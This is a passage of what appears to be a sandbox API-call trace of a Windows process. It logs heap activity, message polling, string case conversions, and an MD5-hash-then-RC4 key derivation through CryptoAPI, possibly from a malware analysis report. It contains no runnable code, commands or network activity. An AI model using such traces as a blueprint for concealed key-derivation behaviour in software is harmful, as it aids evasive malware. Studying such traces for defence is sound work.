Flags=0x0, Size=0x8) returned 0x24b1788 [0254.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.934] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.934] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.934] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.936] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.936] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.936] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.937] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.937] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.937] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.937] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.938] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.938] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.938] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.938] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.938] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.938] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.938] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.938] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.938] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.938] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.938] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.938] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.938] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.939] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.939] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.939] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0254.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.939] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0254.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.939] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.939] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.940] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.940] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.940] CryptHashData (hHash=0xaa5860, pbData=0x24b1798, dwDataLen=0x3, dwFlags=0x1) returned 1 [0254.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.940] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.940] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.941] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.941] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.941] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.941] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.941] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.941] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.941] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.941] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.941] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0254.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0254.946] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0254.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 